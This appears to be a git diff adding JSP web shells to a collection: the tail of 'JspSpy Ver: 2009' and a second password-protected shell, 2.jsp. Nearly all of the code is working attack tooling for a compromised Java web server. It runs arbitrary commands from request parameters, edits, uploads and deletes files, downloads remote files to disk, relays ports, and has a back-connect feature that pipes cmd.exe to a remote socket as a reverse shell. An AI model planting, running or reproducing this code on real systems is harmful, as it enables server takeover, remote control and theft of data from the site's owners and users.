    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DownRemoteInvoker extends DefaultInvoker { +public boolean doBefore(){return true;} +public boolean doAfter(){return true;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String downFileUrl = request.getParameter("url"); +String savePath = request.getParameter("savepath"); +if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath)) +return; +URL downUrl = new URL(downFileUrl); +URLConnection conn = downUrl.openConnection(); +BufferedInputStream in = new BufferedInputStream(conn.getInputStream()); +BufferedOutputStream out = new BufferedOutputStream(new FileOutputStream(new File(savePath))); +byte[] data = new byte[1024]; +int len = in.read(data); +while (len != -1) { +out.write(data,0,len); +len = in.read(data); +} +in.close(); +out.close(); +JSession.setAttribute("done","d"); +ins.get("vd").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class IndexInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +ins.get("filelist").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MkDirInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String name = request.getParameter("name"); +File f = new File(name); +if (!f.isAbsolute()) { +String path = JSession.getAttribute(CURRENT_DIR).toString(); +if (!path.endsWith("/")) +path += "/"; +path += name; +f = new File(path); +} +f.mkdirs(); +JSession.setAttribute(MSG,"Make Directory Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MoveInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String src = request.getParameter("src"); +String target = request.getParameter("to"); +if (!Util.isEmpty(target) && !Util.isEmpty(src)) { +File file = new File(src); +if(file.renameTo(new File(target))) { +JSession.setAttribute(MSG,"Move File Success!"); +} else { +String msg = "Move File Failed!"; +if (file.isDirectory()) { +msg += "The Move Will Failed When The Directory Is Not Empty."; +} +JSession.setAttribute(MSG,msg); +} +response.sendRedirect(SHELL_NAME+"?o=index"); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class RemoteDirInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String dir = request.getParameter("dir"); +File file = new File(dir); +if (file.exists()) { +deleteFile(file); +deleteDir(file); +} + +JSession.setAttribute(MSG,"Remove Directory Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +public void deleteFile(File f) { +if (f.isFile()) { +f.delete(); +}else { +File[] list = f.listFiles(); +for (File ff:list) { +deleteFile(ff); +} +} +} +public void deleteDir(File f) { +File[] list = f.listFiles(); +if (list.length == 0) { +f.delete(); +} else { +for (File ff:list) { +deleteDir(ff); +} +deleteDir(f); +} +} +} +private static class PackBatchInvoker extends DefaultInvoker{ +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String files = request.getParameter("files"); +if (Util.isEmpty(files)) +return; +String saveFileName = request.getParameter("savefilename"); +File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName); +if (saveF.exists()) { +JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); +String[] arr = files.split(","); +for (String f:arr) { +File pF = new File(JSession.getAttribute(CURRENT_DIR).toString(),f); +ZipEntry entry = new ZipEntry(pF.getName()); +zout.putNextEntry(entry); +FileInputStream fInput = new FileInputStream(pF); +int len = 0; +byte[] buf = new byte[1024]; +while ((len = fInput.read(buf)) != -1) { +zout.write(buf, 0, len); +zout.flush(); +} +fInput.close(); +} +zout.close(); +JSession.setAttribute(MSG,"Pack Files Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +} +private static class PackInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String packedFile = request.getParameter("packedfile"); +if (Util.isEmpty(packedFile)) +return; +String saveFileName = request.getParameter("savefilename"); +File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName); +if (saveF.exists()) { +JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +File pF = new File(packedFile); +ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); +String base = ""; +if (pF.isDirectory()) { +zipDir(pF,base,zout); +} else { +zipFile(pF,base,zout); +} +zout.close(); +JSession.setAttribute(MSG,"Pack File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +public void zipDir(File f,String base,ZipOutputStream zout) throws Exception { +if (f.isDirectory()) { +File[] arr = f.listFiles(); +for (File ff:arr) { +String tmpBase = base; +if (!Util.isEmpty(tmpBase) && !tmpBase.endsWith("/")) +tmpBase += "/"; +zipDir(ff,tmpBase+f.getName(),zout); +} +} else { +String tmpBase = base; +if (!Util.isEmpty(tmpBase) &&!tmpBase.endsWith("/")) +tmpBase += "/"; +zipFile(f,tmpBase,zout); +} +} +public void zipFile(File f,String base,ZipOutputStream zout) throws Exception{ +ZipEntry entry = new ZipEntry(base+f.getName()); +zout.putNextEntry(entry); +FileInputStream fInput = new FileInputStream(f); +int len = 0; +byte[] buf = new byte[1024]; +while ((len = fInput.read(buf)) != -1) { +zout.write(buf, 0, len); +zout.flush(); +} +fInput.close(); +} +} +private static class UnPackInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String savepath = request.getParameter("savepath"); +String zipfile = request.getParameter("zipfile"); +if (Util.isEmpty(savepath) || Util.isEmpty(zipfile)) +return; +File save = new File(savepath); +save.mkdirs(); +ZipFile file = new ZipFile(new File(zipfile)); +Enumeration e = file.entries(); +while (e.hasMoreElements()) { +ZipEntry en = (ZipEntry) e.nextElement(); +String entryPath = en.getName(); +int index = entryPath.lastIndexOf("/"); +if (index != -1) +entryPath = entryPath.substring(0,index); +File absEntryFile = new File(save,entryPath); +if (!absEntryFile.exists() && (en.isDirectory() || en.getName().indexOf("/") != -1)) +absEntryFile.mkdirs(); +BufferedOutputStream output = null; +BufferedInputStream input = null; +try { +output = new BufferedOutputStream( +new FileOutputStream(new File(save,en.getName()))); +input = new BufferedInputStream( +file.getInputStream(en)); +byte[] b = new byte[1024]; +int len = input.read(b); +while (len != -1) { +output.write(b, 0, len); +len = input.read(b); +} +} catch (Exception ex) { +} finally { +try { +if (output != null) +output.close(); +if (input != null) +input.close(); +} catch (Exception ex1) { +} +} +} +file.close(); +JSession.setAttribute(MSG,"Unzip File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VMapPort +private static class VmpInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object localIP = JSession.getAttribute("localIP"); +Object localPort = JSession.getAttribute("localPort"); +Object remoteIP = JSession.getAttribute("remoteIP"); +Object remotePort = JSession.getAttribute("remotePort"); +Object done = JSession.getAttribute("done"); + +JSession.removeAttribute("localIP"); +JSession.removeAttribute("localPort"); +JSession.removeAttribute("remoteIP"); +JSession.removeAttribute("remotePort"); +JSession.removeAttribute("done"); + +if (Util.isEmpty(localIP)) +localIP = InetAddress.getLocalHost().getHostAddress(); +if (Util.isEmpty(localPort)) +localPort = "3389"; +if (Util.isEmpty(remoteIP)) +remoteIP = "www.forjj.com"; +if (Util.isEmpty(remotePort)) +remotePort = "80"; +if (!Util.isEmpty(done)) +Util.outMsg(out,done.toString()); + +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +""+ +"

    PortMap >>

    "+ +"
    "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    Local Ip :"+ +" "+ +" Local Port :"+ +" Remote Ip :"+ +" Remote Port :"+ +"

    "+ +" "+ +" "+ +"
    "+ +"
    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//StopMapPort +private static class SmpInvoker extends DefaultInvoker { +public boolean doAfter(){return true;} +public boolean doBefore(){return true;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket server = (ServerSocket)JSession.getAttribute(PORT_MAP); +server.close(); +} +JSession.setAttribute("done","Stop Success!"); +ins.get("vmp").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MapPortInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String localIP = request.getParameter("localIP"); +String localPort = request.getParameter("localPort"); +final String remoteIP = request.getParameter("remoteIP"); +final String remotePort = request.getParameter("remotePort"); +if (Util.isEmpty(localIP) || Util.isEmpty(localPort) || Util.isEmpty(remoteIP) || Util.isEmpty(remotePort)) +return; +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket s = (ServerSocket)obj; +s.close(); +} +final ServerSocket server = new ServerSocket(); +server.bind(new InetSocketAddress(localIP,Integer.parseInt(localPort))); +JSession.setAttribute(PORT_MAP,server); +new Thread(new Runnable(){ +public void run(){ +while (true) { +Socket soc = null; +Socket remoteSoc = null; +DataInputStream remoteIn = null; +DataOutputStream remoteOut = null; +DataInputStream localIn = null; +DataOutputStream localOut = null; +try{ +soc = server.accept(); +remoteSoc = new Socket(); +remoteSoc.connect(new InetSocketAddress(remoteIP,Integer.parseInt(remotePort))); +remoteIn = new DataInputStream(remoteSoc.getInputStream()); +remoteOut = new DataOutputStream(remoteSoc.getOutputStream()); +localIn = new DataInputStream(soc.getInputStream()); +localOut = new DataOutputStream(soc.getOutputStream()); +this.readFromLocal(localIn,remoteOut); +this.readFromRemote(soc,remoteSoc,remoteIn,localOut); +}catch(Exception ex) +{ +break; +} +} +} +public void readFromLocal(final DataInputStream localIn,final DataOutputStream remoteOut){ +new Thread(new Runnable(){ +public void run(){ +while (true) { +try{ +byte[] data = new byte[100]; +int len = localIn.read(data); +while (len != -1) { +remoteOut.write(data,0,len); +len = localIn.read(data); +} +}catch (Exception e) { +break; +} +} +} +}).start(); +} +public void readFromRemote(final Socket soc,final Socket remoteSoc,final DataInputStream remoteIn,final DataOutputStream localOut){ +new Thread(new Runnable(){ +public void run(){ +while(true) { +try{ +byte[] data = new byte[100]; +int len = remoteIn.read(data); +while (len != -1) { +localOut.write(data,0,len); +len = remoteIn.read(data); +} +}catch (Exception e) { +try{ +soc.close(); +remoteSoc.close(); +}catch(Exception ex) { +} +break; +} +} +} +}).start(); +} +}).start(); +JSession.setAttribute("done","Map Port Success!"); +JSession.setAttribute("localIP",localIP); +JSession.setAttribute("localPort",localPort); +JSession.setAttribute("remoteIP",remoteIP); +JSession.setAttribute("remotePort",remotePort); +response.sendRedirect(SHELL_NAME+"?o=vmp"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VBackConnect +private static class VbcInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object ip = JSession.getAttribute("ip"); +Object port = JSession.getAttribute("port"); +Object program = JSession.getAttribute("program"); +Object done = JSession.getAttribute("done"); +JSession.removeAttribute("ip"); +JSession.removeAttribute("port"); +JSession.removeAttribute("program"); +JSession.removeAttribute("done"); +if (Util.isEmpty(ip)) +ip = request.getRemoteAddr(); +if (Util.isEmpty(port) || !Util.isInteger(port.toString())) +port = "4444"; +if (Util.isEmpty(program)) +program = "cmd.exe"; +if (!Util.isEmpty(done)) +Util.outMsg(out,done.toString()); +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +""+ +"

    Back Connect >>

    "+ +"
    "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    Your Ip :"+ +" "+ +" Your Port :"+ +" Program To Back :"+ +"

    "+ +" "+ +"
    "+ +"
    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BackConnectInvoker extends DefaultInvoker { +public boolean doAfter(){return false;} +public boolean doBefore(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String ip = request.getParameter("ip"); +String port = request.getParameter("port"); +String program = request.getParameter("program"); +if (Util.isEmpty(ip) || Util.isEmpty(program) || !Util.isInteger(port)) +return; +Socket socket = new Socket(ip,Integer.parseInt(port)); +Process process = Runtime.getRuntime().exec(program); +(new StreamConnector(process.getInputStream(), socket.getOutputStream())).start(); +(new StreamConnector(socket.getInputStream(), process.getOutputStream())).start(); +JSession.setAttribute("done","Back Connect Success!"); +JSession.setAttribute("ip",ip); +JSession.setAttribute("port",port); +JSession.setAttribute("program",program); +response.sendRedirect(SHELL_NAME+"?o=vbc"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class JspEnvInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""+ +" "+ +" "+ +" "+ +"

    System Properties >>

    "+ +"
    "+ +"
    "+ +"
      "); +Properties pro = System.getProperties(); +Enumeration names = pro.propertyNames(); +while (names.hasMoreElements()){ +String name = (String)names.nextElement(); +out.println("
    • "+Util.htmlEncode(name)+" : "+Util.htmlEncode(pro.getProperty(name))+"
      • "); +} +out.println("

    System Environment >>

      "); +Map envs = System.getenv(); +Set> entrySet = envs.entrySet(); +for (Map.Entry en:entrySet) { +out.println("
    • "+Util.htmlEncode(en.getKey())+" : "+Util.htmlEncode(en.getValue())+"
      • "); +} +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class TopInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    JspSpy Ver: 2009"+request.getHeader("host")+" ("+InetAddress.getLocalHost().getHostAddress()+")
    Logout | "+ +" File Manager | "+ +" DataBase Manager | "+ +" Execute Command | "+ +" Shell OnLine | "+ +" Back Connect | "+ +" Port Scan | "+ +" Download Remote File | "+ +" ClipBoard | "+ +" Remote Control | "+ +" Port Map | "+ +" JSP Env "+ +"
    "); +if (JSession.getAttribute(MSG) != null) { +Util.outMsg(out,JSession.getAttribute(MSG).toString()); +JSession.removeAttribute(MSG); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VOnLineShellInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +out.println(""+ +" "+ +" "+ +" "+ +"
    "); +out.println("

    Shell OnLine »


    "); +out.println("
    "+ +" "+ +" "+ +" Notice ! If You Are Using IE , You Must Input A Command First After You Start Or You Will Not See The Echo"+ +"
    "+ +"
    "+ +" "+ +"
    "+ +" "+ +" "+ +" "+ +" Auto Scroll"+ +" "+ +"
    "+ +" " +); +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class OnLineInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String type = request.getParameter("type"); +if (Util.isEmpty(type)) +return; +if (type.toLowerCase().equals("start")) { +String exe = request.getParameter("exe"); +if (Util.isEmpty(exe)) +return; +Process pro = Runtime.getRuntime().exec(exe); +ByteArrayOutputStream outs = new ByteArrayOutputStream(); +response.setContentLength(100000000); +response.setContentType("text/html;charset="+Charset.defaultCharset().name()); +OnLineProcess olp = new OnLineProcess(pro); +JSession.setAttribute(SHELL_ONLINE,olp); +new OnLineConnector(new ByteArrayInputStream(outs.toByteArray()),pro.getOutputStream(),"exeOclientR",olp).start(); +new OnLineConnector(pro.getInputStream(),response.getOutputStream(),"exeRclientO",olp).start(); +new OnLineConnector(pro.getErrorStream(),response.getOutputStream(),"exeRclientO",olp).start();//Ϣ +Thread.sleep(1000 * 60 * 60 * 24); +} else if (type.equals("ecmd")) { +Object o = JSession.getAttribute(SHELL_ONLINE); +String cmd = request.getParameter("cmd"); +if (Util.isEmpty(cmd)) +return; +if (o == null) +return; +OnLineProcess olp = (OnLineProcess)o; +olp.setCmd(cmd); +} else { +Object o = JSession.getAttribute(SHELL_ONLINE); +if (o == null) +return; +OnLineProcess olp = (OnLineProcess)o; +olp.stop(); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} + +static{ +ins.put("script",new ScriptInvoker()); +ins.put("before",new BeforeInvoker()); +ins.put("after",new AfterInvoker()); +ins.put("deleteBatch",new DeleteBatchInvoker()); +ins.put("clipboard",new ClipBoardInvoker()); +ins.put("vRemoteControl",new VRemoteControlInvoker()); +ins.put("gc",new GcInvoker()); +ins.put("vPortScan",new VPortScanInvoker()); +ins.put("portScan",new PortScanInvoker()); +ins.put("vConn",new VConnInvoker()); +ins.put("dbc",new DbcInvoker()); +ins.put("executesql",new ExecuteSQLInvoker()); +ins.put("vLogin",new VLoginInvoker()); +ins.put("login",new LoginInvoker()); +ins.put("filelist", new FileListInvoker()); +ins.put("logout",new LogoutInvoker()); +ins.put("upload",new UploadInvoker()); +ins.put("copy",new CopyInvoker()); +ins.put("bottom",new BottomInvoker()); +ins.put("vCreateFile",new VCreateFileInvoker()); +ins.put("vEdit",new VEditInvoker()); +ins.put("createFile",new CreateFileInvoker()); +ins.put("vEditProperty",new VEditPropertyInvoker()); +ins.put("editProperty",new EditPropertyInvoker()); +ins.put("vs",new VsInvoker()); +ins.put("shell",new ShellInvoker()); +ins.put("down",new DownInvoker()); +ins.put("vd",new VdInvoker()); +ins.put("downRemote",new DownRemoteInvoker()); +ins.put("index",new IndexInvoker()); +ins.put("mkdir",new MkDirInvoker()); +ins.put("move",new MoveInvoker()); +ins.put("removedir",new RemoteDirInvoker()); +ins.put("packBatch",new PackBatchInvoker()); +ins.put("pack",new PackInvoker()); +ins.put("unpack",new UnPackInvoker()); +ins.put("vmp",new VmpInvoker()); +ins.put("vbc",new VbcInvoker()); +ins.put("backConnect",new BackConnectInvoker()); +ins.put("jspEnv",new JspEnvInvoker()); +ins.put("smp",new SmpInvoker()); +ins.put("mapPort",new MapPortInvoker()); +ins.put("top",new TopInvoker()); +ins.put("vso",new VOnLineShellInvoker()); +ins.put("online",new OnLineInvoker()); +} +%> +<% +try { +String o = request.getParameter("o"); +if (!Util.isEmpty(o)) { +Invoker in = ins.get(o); +if (in == null) { +response.sendRedirect(SHELL_NAME+"?o=index"); +} else { +if (in.doBefore()) { +String path = request.getParameter("folder"); +if (!Util.isEmpty(path)) +session.setAttribute(CURRENT_DIR,path); +ins.get("before").invoke(request,response,session); +ins.get("script").invoke(request,response,session); +ins.get("top").invoke(request,response,session); +} +in.invoke(request,response,session); +if (!in.doAfter()) { +return; +}else{ +ins.get("bottom").invoke(request,response,session); +ins.get("after").invoke(request,response,session); +} +} +} else { +response.sendRedirect(SHELL_NAME+"?o=index"); +} +} catch (Exception e) { +ByteArrayOutputStream bout = new ByteArrayOutputStream(); +e.printStackTrace(new PrintStream(bout)); +session.setAttribute(CURRENT_DIR,SHELL_DIR); +Util.outMsg(out,Util.htmlEncode(new String(bout.toByteArray())).replace("\n","
    "),"left"); +bout.close(); +out.flush(); +ins.get("bottom").invoke(request,response,session); +ins.get("after").invoke(request,response,session); +} +%> \ No newline at end of file diff --git a/jsp/hackk8/fuck-jsp/jspbrowser/2.jsp b/jsp/hackk8/fuck-jsp/jspbrowser/2.jsp new file mode 100644 index 0000000..99a82b5 --- /dev/null +++ b/jsp/hackk8/fuck-jsp/jspbrowser/2.jsp @@ -0,0 +1,1778 @@ +<%@ page contentType="text/html; charset=GBK" %> +<%@ page import="java.io.*"%> +<%@ page import="java.util.Map"%> +<%@ page import="java.util.HashMap"%> +<%@ page import="java.nio.charset.Charset"%> +<%@ page import="java.util.regex.*"%> +<%@ page import="java.sql.*"%> +<%! +private String _password = "ceshi2009"; +private String _encodeType = "GB2312"; +private int _sessionOutTime = 20; +private String[] _textFileTypes = {"txt", "htm", "html", "asp", "jsp", "java", "js", "css", "c", "cpp", "sh", "pl", "cgi", "php", "conf", "xml", "xsl", "ini", "vbs", "inc"}; +private Connection _dbConnection = null; +private Statement _dbStatement = null; +private String _url = null; + +public boolean validate(String password) { + if (password.equals(_password)) { + return true; + } else { + return false; + } +} + +public String HTMLEncode(String str) { + str = str.replaceAll(" ", " "); + str = str.replaceAll("<", "<"); + str = str.replaceAll(">", ">"); + str = str.replaceAll("\r\n", "
    "); + + return str; +} + +public String Unicode2GB(String str) { + String sRet = null; + + try { + sRet = new String(str.getBytes("ISO8859_1"), _encodeType); + } catch (Exception e) { + sRet = str; + } + + return sRet; +} + +public String exeCmd(String cmd) { + Runtime runtime = Runtime.getRuntime(); + Process proc = null; + String retStr = ""; + InputStreamReader insReader = null; + char[] tmpBuffer = new char[1024]; + int nRet = 0; + + try { + proc = runtime.exec(cmd); + insReader = new InputStreamReader(proc.getInputStream(), Charset.forName("GB2312")); + + while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) { + retStr += new String(tmpBuffer, 0, nRet); + } + + insReader.close(); + retStr = HTMLEncode(retStr); + } catch (Exception e) { + retStr = "bad command \"" + cmd + "\""; + } finally { + return retStr; + } +} + +public String pathConvert(String path) { + String sRet = path.replace('\\', '/'); + File file = new File(path); + + if (file.getParent() != null) { + if (file.isDirectory()) { + if (! sRet.endsWith("/")) + sRet += "/"; + } + } else { + if (! sRet.endsWith("/")) + sRet += "/"; + } + + return sRet; +} + +public String strCut(String str, int len) { + String sRet; + + len -= 3; + + if (str.getBytes().length <= len) { + sRet = str; + } else { + try { + sRet = (new String(str.getBytes(), 0, len, "GBK")) + "..."; + } catch (Exception e) { + sRet = str; + } + } + + return sRet; +} + +public String listFiles(String path, String curUri) { + File[] files = null; + File curFile = null; + String sRet = null; + int n = 0; + boolean isRoot = path.equals(""); + + path = pathConvert(path); + + try { + if (isRoot) { + files = File.listRoots(); + } else { + try { + curFile = new File(path); + String[] sFiles = curFile.list(); + files = new File[sFiles.length]; + + for (n = 0; n < sFiles.length; n ++) { + files[n] = new File(path + sFiles[n]); + } + } catch (Exception e) { + sRet = "bad path \"" + path + "\""; + } + } + + if (sRet == null) { + sRet = "\n"; + sRet += "\n"; + sRet += "\n"; + sRet += " \n"; + + if (curFile != null) { + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + } + + sRet += "\n"; + + sRet += " \n"; + + for (n = 0; n < files.length; n ++) { + sRet += " \n"; + + if (! isRoot) { + sRet += " \n"; + if (files[n].isDirectory()) { + sRet += " \n"; + } else { + sRet += " \n"; + } + + sRet += " \n"; + sRet += " \n"; + } else { + sRet += " \n"; + } + + sRet += " \n"; + } + sRet += " \n"; + sRet += "
    \n"; + sRet += "  ϼĿ¼ "; + sRet += "Ŀ¼ "; + sRet += "½ļ "; + sRet += "ɾ "; + sRet += " "; + sRet += " "; + sRet += "ϴļ\n"; + sRet += " \n"; + sRet += "
    <" + strCut(files[n].getName(), 50) + ">" + strCut(files[n].getName(), 50) + "" + (files[n].isDirectory() ? "<dir>" : "") + ((! files[n].isDirectory()) && isTextFile(getExtName(files[n].getPath())) ? "<edit>" : "") + "" + files[n].length() + "" + pathConvert(files[n].getPath()) + "
    \n"; + } + } catch (SecurityException e) { + sRet = "security violation, no privilege."; + } + + return sRet; +} + +public boolean isTextFile(String extName) { + int i; + boolean bRet = false; + + if (! extName.equals("")) { + for (i = 0; i < _textFileTypes.length; i ++) { + if (extName.equals(_textFileTypes[i])) { + bRet = true; + break; + } + } + } else { + bRet = true; + } + + return bRet; +} + +public String getExtName(String fileName) { + String sRet = ""; + int nLastDotPos; + + fileName = pathConvert(fileName); + + nLastDotPos = fileName.lastIndexOf("."); + + if (nLastDotPos == -1) { + sRet = ""; + } else { + sRet = fileName.substring(nLastDotPos + 1); + } + + return sRet; +} + +public String browseFile(String path) { + String sRet = ""; + File file = null; + FileReader fileReader = null; + + path = pathConvert(path); + + try { + file = new File(path); + fileReader = new FileReader(file); + String fileString = ""; + char[] chBuffer = new char[1024]; + int ret; + + sRet = "\n"; + + } catch (IOException e) { + sRet += "\n"; + } + + return sRet; +} + +public String openFile(String path, String curUri) { + String sRet = ""; + boolean canOpen = false; + int nLastDotPos = path.lastIndexOf("."); + String extName = ""; + String fileString = null; + File curFile = null; + + path = pathConvert(path); + + if (nLastDotPos == -1) { + canOpen = true; + } else { + extName = path.substring(nLastDotPos + 1); + canOpen = isTextFile(extName); + } + + if (canOpen) { + try { + fileString = ""; + curFile = new File(path); + FileReader fileReader = new FileReader(curFile); + char[] chBuffer = new char[1024]; + int nRet; + + while ((nRet = fileReader.read(chBuffer, 0, 1024)) != -1) { + fileString += new String(chBuffer, 0, nRet); + } + + fileReader.close(); + } catch (IOException e) { + fileString = null; + sRet = "ܴļ\"" + path + "\""; + } catch (SecurityException e) { + fileString = null; + sRet = "ȫ⣬ûȨִиò"; + } + } else { + sRet = "file \"" + path + "\" is not a text file, can't be opened in text mode"; + } + + if (fileString != null) { + sRet += "\n"; + sRet += "\n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += "
    [ϼĿ¼]
    \n"; + sRet += " \n"; + sRet += "
     
    \n"; + } + + return sRet; +} + +public String saveFile(String path, String curUri, String fileContent) { + String sRet = ""; + File file = null; + + path = pathConvert(path); + + try { + file = new File(path); + + if (! file.canWrite()) { + sRet = "ļд"; + } else { + FileWriter fileWriter = new FileWriter(file); + fileWriter.write(fileContent); + + fileWriter.close(); + sRet = "ļɹڷأԺ򡭡\n"; + sRet += "\n"; + } + } catch (IOException e) { + sRet = "ļʧ"; + } catch (SecurityException e) { + sRet = "ȫ⣬ûȨִиò"; + } + + return sRet; +} + +public String createFolder(String path, String curUri, String folderName) { + String sRet = ""; + File folder = null; + + path = pathConvert(path); + + try { + folder = new File(path + folderName); + + if (folder.exists() && folder.isDirectory()) { + sRet = "\"" + path + folderName + "\"Ŀ¼Ѿ"; + } else { + if (folder.mkdir()) { + sRet = "ɹĿ¼\"" + pathConvert(folder.getPath()) + "\"ڷأԺ򡭡\n"; + sRet += ""; + } else { + sRet = "Ŀ¼\"" + folderName + "\"ʧ"; + } + } + } catch (SecurityException e) { + sRet = "ȫ⣬ûȨִиò"; + } + + return sRet; +} + +public String createFile(String path, String curUri, String fileName) { + String sRet = ""; + File file = null; + + path = pathConvert(path); + + try { + file = new File(path + fileName); + + if (file.createNewFile()) { + sRet = ""; + } else { + sRet = "\"" + path + fileName + "\"ļѾ"; + } + } catch (SecurityException e) { + sRet = "ȫ⣬ûȨִиò"; + } catch (IOException e) { + sRet = "ļ\"" + path + fileName + "\"ʧ"; + } + + return sRet; +} + +public String deleteFile(String path, String curUri, String[] files2Delete) { + String sRet = ""; + File tmpFile = null; + + try { + for (int i = 0; i < files2Delete.length; i ++) { + tmpFile = new File(files2Delete[i]); + if (! tmpFile.delete()) { + sRet += "ɾ\"" + files2Delete[i] + "\"ʧ
    \n"; + } + } + + if (sRet.equals("")) { + sRet = "ɾɹڷأԺ򡭡\n"; + sRet += ""; + } + } catch (SecurityException e) { + sRet = "ȫ⣬ûȨִиò\n"; + } + + return sRet; +} + +public String saveAs(String path, String curUri, String fileContent) { + String sRet = ""; + File file = null; + FileWriter fileWriter = null; + + try { + file = new File(path); + + if (file.createNewFile()) { + fileWriter = new FileWriter(file); + fileWriter.write(fileContent); + fileWriter.close(); + + sRet = ""; + } else { + sRet = "ļ\"" + path + "\"Ѿ"; + } + } catch (IOException e) { + sRet = "ļ\"" + path + "\"ʧ"; + } + + return sRet; +} + + +public String uploadFile(ServletRequest request, String path, String curUri) { + String sRet = ""; + File file = null; + InputStream in = null; + + path = pathConvert(path); + + try { + in = request.getInputStream(); + + byte[] inBytes = new byte[request.getContentLength()]; + int nBytes; + int start = 0; + int end = 0; + int size = 1024; + String token = null; + String filePath = null; + + // + // һֽ + // + while ((nBytes = in.read(inBytes, start, size)) != -1) { + start += nBytes; + } + + in.close(); + // + // ֽеõļָ + // + int i = 0; + byte[] seperator; + + while (inBytes[i] != 